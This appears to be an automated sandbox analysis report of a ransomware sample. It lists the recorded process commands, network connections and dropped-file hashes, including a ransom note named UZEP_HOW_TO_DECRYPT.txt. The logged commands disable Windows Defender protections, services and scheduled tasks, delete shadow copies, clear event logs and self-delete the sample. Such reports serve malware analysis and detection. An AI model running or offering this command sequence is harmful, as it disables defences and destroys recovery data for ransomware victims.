reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl system

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl security

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl application

C:\Windows\SysWOW64\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\SysWOW64\Wbem\wmic.exe

wmic.exe shadowcopy delete

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Program Files\Windows Defender\MpCmdRun.exe

"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\SysWOW64\notepad.exe

notepad.exe C:\UZEP_HOW_TO_DECRYPT.txt

C:\Windows\SysWOW64\cmd.exe

cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe"

C:\Windows\SysWOW64\PING.EXE

ping.exe -n 5 127.0.0.1

Network

Country Destination Domain Proto
US 52.109.12.20:443 N/A tcp
US 8.8.8.8:53 time.windows.com udp
NL 20.101.57.9:123 time.windows.com udp
NL 23.2.164.159:80 N/A tcp

Files

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 1c19c16e21c97ed42d5beabc93391fc5
SHA1 8ad83f8e0b3acf8dfbbf87931e41f0d664c4df68
SHA256 1bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05
SHA512 7d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 518d86f71236ae615fc6178a24af8ef9
SHA1 94f98420db55681679be31f1ce33ced537df589b
SHA256 bc7e28d64ad5e22ef44869a944909a5aac5c0013fd078d69c0bf1b49414178ba
SHA512 c389965b3071340cf02ab79b1a6edb458ea1897212b267c7147a47042b356fa48bfc3c24f874439686dc8390d1b8b6ff1a8094db268a76da11b41c366b07436c

C:\UZEP_HOW_TO_DECRYPT.txt

MD5 c4bfe3cc5113f57dc2e5b89c7374e048
SHA1 3a43c21e9401fb7d6d9cd3941aa853eb407b0b6b
SHA256 4dedc0a2be54c954d754e5e597b72bb54fdd706a0039b01b0ff9107fe4c10acb
SHA512 e8dbc2b6f7142cf9ba075861026edf795ea5f6bd852e286fce821ada6f2caf4dc7ba7ecafe44a1b0dc937ab7dc67d8ea787d6518c9ee67db8b88b1557ff847c3